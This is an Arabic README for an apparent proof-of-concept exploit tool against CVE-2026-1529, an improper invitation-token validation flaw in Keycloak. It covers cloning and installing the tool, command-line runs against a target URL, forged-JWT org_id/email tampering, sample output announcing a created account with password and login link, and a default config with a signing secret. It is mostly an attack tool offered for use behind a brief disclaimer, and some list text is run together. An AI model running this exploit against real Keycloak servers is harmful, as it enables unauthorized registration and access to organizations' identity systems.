
CVE-2026-1529 (PoC) هي ثغرة أمنية حرجة في Keycloak تسمح بتسجيل مؤسسات غير مصرح بها من خلال التحقق غير السليم من رموز الدعوة. توضح أداة الاستغلال هذه الثغرة عبر التلاعب برموز JWT لتسجيل المستخدمين في مؤسسات غير مصرح بها.
Keycloak: تسجيل مؤسسة غير مصرح به عبر التحقق غير السليم من رمز الدعوة
هذه الأداة لأغراض تعليمية واختبار الأمان فقط. استخدمها فقط على الأنظمة التي لديك إذن صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي. مؤلفو هذه الأداة غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
أنشأها: f3ds cr3w est, 2002
CVE-2026-1529 هي ثغرة حرجة في Keycloak تسمح بتسجيل مؤسسات غير مصرح بها من خلال التحقق غير السليم من رمز الدعوة. توضح هذه الأداة الاستغلالية الثغرة من خلال التلاعب برموز JWT لتسجيل المستخدمين في مؤسسات غير مصرح بها.
توجد الثغرة في عملية التحقق من رمز JWT لدعوات المؤسسات. يمكن للمهاجمين التلاعب بحقلي org_id و email في حمولة JWT، مما يسمح لهم بتسجيل المستخدمين في أي مؤسسة دون تفويض صحيح.
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
pip install -r requirements.txt
chmod +x keycloak-exploit.py
# Standard usage with target URL
python keycloak-exploit.py https://target-keycloak.com
# Show help
python keycloak-exploit.py -h
# Show version
python keycloak-exploit.py -v
# Use custom invitation token
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com
# Use custom organization ID
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com
# Use custom configuration file
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com
# Enable debug logging
python keycloak-exploit.py -d https://target-keycloak.com
عند نجاح الاستغلال، سترى مخرجات مثل:
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529
🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account
📄 Report saved to: output/reports/exploit_report_20260210_134556.txt
🔐 Use the provided credentials to access the Keycloak instance!
⚠️ This demonstrates unauthorized access due to CVE-2026-1529
=============================================================
by f3ds cr3w est, 2002
=============================================================
إذا فشل الاستغلال، سترى:
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable
❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log
CVE-2026-1529-POC/
├── keycloak-exploit.py # Main exploit script
├── requirements.txt # Python dependencies
├── README.md # This file
├── config/
│ └── default_config.json # Default configuration
├── utils/
│ ├── jwt_utils.py # JWT manipulation utilities
│ ├── http_utils.py # HTTP client utilities
│ └── crypto_utils.py # Cryptographic utilities
├── output/
│ ├── logs/ # Log files
│ └── reports/ # Exploit reports
تستخدم الأداة ملف إعدادات افتراضي (config/default_config.json) بالإعدادات التالية:
{
"exploit": {
"default_username": "admin_user_2026",
"default_password": "KeycloakCVE2026!",
"default_email": "[email protected]",
"timeout": 30,
"max_retries": 3
},
"jwt": {
"algorithm": "HS256",
"secret_key": "keycloak-cve-2026-1529-exploit",
"token_expiry": 3600
},
"target": {
"endpoints": {
"realms": "/realms",
"organizations": "/organizations",
"register": "/register",
"login": "/login"
}
},
"output": {
"log_level": "INFO",
"save_reports": true,
"report_format": "txt"
}
}
يمكنك إنشاء ملف إعدادات مخصص واستخدامه مع الخيار -c:
{
"exploit": {
"default_username": "custom_user",
"default_password": "CustomPassword123!",
"default_email": "[email protected]",
"timeout": 60,
"max_retries": 5
},
"jwt": {
"algorithm": "HS256",
"secret_key": "custom-secret-key",
"token_expiry": 7200
}
}
تستغل الأداة التحقق غير السليم من JWT من خلال:
org_id لاستهداف مؤسسة مختلفةemail إذا لزم الأمرأخطاء الاتصال
أخطاء التحقق من الرمز
org_id, email, invitation_type)فشل التسجيل
فعّل تسجيل التصحيح لاستكشاف الأخطاء بالتفصيل:
python keycloak-exploit.py -d https://target-keycloak.com
logs/exploit.logoutput/reports/exploit_report_YYYYMMDD_HHMMSS.txtتنفذ الأداة الفحوصات التالية:
يُعتبر الاستغلال ناجحًا إذا:
تُقدَّم هذه الأداة لأغراض تعليمية واختبار الأمان فقط. استخدمها على مسؤوليتك الخاصة.
أنشأها: f3ds cr3w est, 2002
التواصل: للأسئلة أو الملاحظات، يرجى الرجوع إلى مستودع المشروع.
تذكر: القوة العظيمة تأتي بمسؤولية عظيمة. استخدم هذه الأداة بحكمة وأخلاق.
بواسطة f3ds cr3w est, 2002
| الخيار | الوصف | مطلوب |
|---|
target | عنوان Keycloak المستهدف (IP أو نطاق) | نعم |
-t, --token | رمز دعوة مخصص للاستخدام | لا |
-o, --org-id | معرف مؤسسة مخصص | لا |
-c, --config | مسار ملف الإعدادات | لا |
-d, --debug | تفعيل تسجيل التصحيح | لا |
-v, --version | عرض معلومات الإصدار | لا |
-h, --help | عرض رسالة المساعدة | لا |